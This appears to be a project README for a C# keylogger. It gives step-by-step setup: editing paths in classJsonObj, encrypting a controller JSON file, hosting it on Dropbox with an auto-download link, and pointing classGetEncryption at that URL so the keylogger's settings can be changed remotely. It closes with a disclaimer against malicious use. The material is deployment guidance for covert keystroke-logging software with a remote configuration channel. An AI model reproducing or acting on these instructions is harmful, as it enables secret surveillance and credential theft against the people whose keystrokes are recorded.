A complete object-oriented remake of a keylogger I've built in 2016, this time in C#.
In order to make the keylogger work, the following is needed to be done:
- Get KeyloggerController
- Edit its local json file directory as well as where to encrypt it to
- In classJsonObj: Change
strJsonDir = @"ADDYOURDIRECTORYHERE"
to a directory with the local Json file.- e.g
strJsonDir = @"C\Users\TestUser\Folder\Controller.json"
- e.g
- In classJsonObj: Change
strEncryptDir = @"ADDYOURDIRECTORYHERE"
to a directory to save that Json file, encrypted.- e.g
strEncryptDir = @"C\Users\TestUser\Folder\EncryptedJson.txt"
- e.g
- In classJsonObj: Change
- Upload the encrypted json file onto a file hosting service like Dropbox, and get its public link (Must auto download!).
- Change KeyloggerRemake's encrypted key to the public link of the specified encrypted directory in the Controller
- In classGetEncryption: Change
strEncryptedFile = "ADDYOURURLHERE"
to the public URL of that encrypted Json file.- e.g
strEncryptedFile = "https://www.dropbox.com/s/dsdddq32re/EncryptedJson.txt?dl=1"
- e.g
- In classGetEncryption: Change
- Change settings in KeyloggerController upon runtime.
- Newtonsoft.Json
I don't support the use of this keylogger in a malicious intent, and therefore I hold no responsibility as to what damage it may inflict upon others.